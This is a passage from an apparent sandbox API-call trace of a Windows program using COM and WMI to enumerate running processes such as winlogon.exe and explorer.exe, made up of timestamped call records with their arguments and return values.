[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x594e0c) returned 0x0 [0279.051] IMarshal:GetUnmarshalClass (in: This=0x594e0c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.051] IUnknown:Release (This=0x594e0c) returned 0x3 [0279.051] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.051] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.051] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.051] IUnknown:Release (This=0x594e08) returned 0x2 [0279.051] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.051] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.051] IUnknown:QueryInterface (in: This=0x594e08, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x594e08) returned 0x0 [0279.051] IUnknown:AddRef (This=0x594e08) returned 0x4 [0279.051] IUnknown:Release (This=0x594e08) returned 0x3 [0279.051] IUnknown:Release (This=0x594e08) returned 0x2 [0279.051] CoTaskMemFree (pv=0x56e9fc0) [0279.051] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.051] IUnknown:AddRef (This=0x594e08) returned 0x3 [0279.051] IWbemClassObject:Get (in: This=0x594e08, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.052] IWbemClassObject:Get (in: This=0x594e08, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.052] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x64 [0279.052] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x64 [0279.052] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.052] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.052] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.052] IUnknown:Release (This=0x500344) returned 0x1 [0279.053] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56e9fc0) returned 0x0 [0279.053] WbemDefPath:IUnknown:QueryInterface (in: This=0x56e9fc0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.053] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56e9fc0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9178) returned 0x0 [0279.054] WbemDefPath:IUnknown:Release (This=0x56e9fc0) returned 0x0 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9178) returned 0x0 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.054] WbemDefPath:IUnknown:AddRef (This=0x5a9178) returned 0x3 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56e9fd0) returned 0x0 [0279.054] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56e9fd0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.054] WbemDefPath:IUnknown:Release (This=0x56e9fd0) returned 0x3 [0279.054] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.054] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.054] WbemDefPath:IUnknown:Release (This=0x5a9178) returned 0x2 [0279.054] WbemDefPath:IUnknown:Release (This=0x5a9178) returned 0x1 [0279.054] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.054] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9178, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9178) returned 0x0 [0279.055] WbemDefPath:IUnknown:AddRef (This=0x5a9178) returned 0x3 [0279.055] WbemDefPath:IUnknown:Release (This=0x5a9178) returned 0x2 [0279.055] WbemDefPath:IWbemPath:SetText (This=0x5a9178, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x0 [0279.055] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.055] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.055] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.055] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.055] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.055] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.055] IWbemClassObject:Get (in: This=0x594e08, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bc444*=0, plFlavor=0x27bc448*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x27bc444*=8, plFlavor=0x27bc448*=0) returned 0x0 [0279.055] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0279.055] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0279.055] IWbemClassObject:Get (in: This=0x594e08, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bc444*=8, plFlavor=0x27bc448*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x27bc444*=8, plFlavor=0x27bc448*=0) returned 0x0 [0279.055] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0279.055] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0279.055] CoTaskMemAlloc (cb=0x4) returned 0x56ea010 [0279.055] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea010, puReturned=0x27bb39c | out: apObjects=0x56ea010*=0x594fa0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.056] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x594fa0) returned 0x0 [0279.056] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.056] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.057] IUnknown:AddRef (This=0x594fa0) returned 0x3 [0279.057] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.057] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.057] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x594fa4) returned 0x0 [0279.057] IMarshal:GetUnmarshalClass (in: This=0x594fa4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.057] IUnknown:Release (This=0x594fa4) returned 0x3 [0279.057] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.057] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.057] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.057] IUnknown:Release (This=0x594fa0) returned 0x2 [0279.057] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.057] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.057] IUnknown:QueryInterface (in: This=0x594fa0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x594fa0) returned 0x0 [0279.057] IUnknown:AddRef (This=0x594fa0) returned 0x4 [0279.057] IUnknown:Release (This=0x594fa0) returned 0x3 [0279.057] IUnknown:Release (This=0x594fa0) returned 0x2 [0279.057] CoTaskMemFree (pv=0x56ea010) [0279.057] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.057] IUnknown:AddRef (This=0x594fa0) returned 0x3 [0279.057] IWbemClassObject:Get (in: This=0x594fa0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.058] IWbemClassObject:Get (in: This=0x594fa0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.058] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x64 [0279.058] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x64 [0279.058] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.058] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.058] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.058] IUnknown:Release (This=0x500344) returned 0x1 [0279.059] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea010) returned 0x0 [0279.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea010, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.059] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea010, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9258) returned 0x0 [0279.059] WbemDefPath:IUnknown:Release (This=0x56ea010) returned 0x0 [0279.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9258) returned 0x0 [0279.059] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.060] WbemDefPath:IUnknown:AddRef (This=0x5a9258) returned 0x3 [0279.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea020) returned 0x0 [0279.060] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea020, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.060] WbemDefPath:IUnknown:Release (This=0x56ea020) returned 0x3 [0279.060] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.060] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.060] WbemDefPath:IUnknown:Release (This=0x5a9258) returned 0x2 [0279.060] WbemDefPath:IUnknown:Release (This=0x5a9258) returned 0x1 [0279.060] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.060] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9258, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9258) returned 0x0 [0279.060] WbemDefPath:IUnknown:AddRef (This=0x5a9258) returned 0x3 [0279.060] WbemDefPath:IUnknown:Release (This=0x5a9258) returned 0x2 [0279.060] WbemDefPath:IWbemPath:SetText (This=0x5a9258, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x0 [0279.060] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.060] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.060] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.060] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.060] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.060] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.061] IWbemClassObject:Get (in: This=0x594fa0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bccb8*=0, plFlavor=0x27bccbc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x27bccb8*=8, plFlavor=0x27bccbc*=0) returned 0x0 [0279.061] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0279.061] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0279.061] IWbemClassObject:Get (in: This=0x594fa0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bccb8*=8, plFlavor=0x27bccbc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x27bccb8*=8, plFlavor=0x27bccbc*=0) returned 0x0 [0279.061] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0279.061] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0279.061] CoTaskMemAlloc (cb=0x4) returned 0x56ea060 [0279.061] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea060, puReturned=0x27bb39c | out: apObjects=0x56ea060*=0x595138, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.062] IUnknown:QueryInterface (in: This=0x595138, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595138) returned 0x0 [0279.062] IUnknown:QueryInterface (in: This=0x595138, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.062] IUnknown:QueryInterface (in: This=0x595138, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, 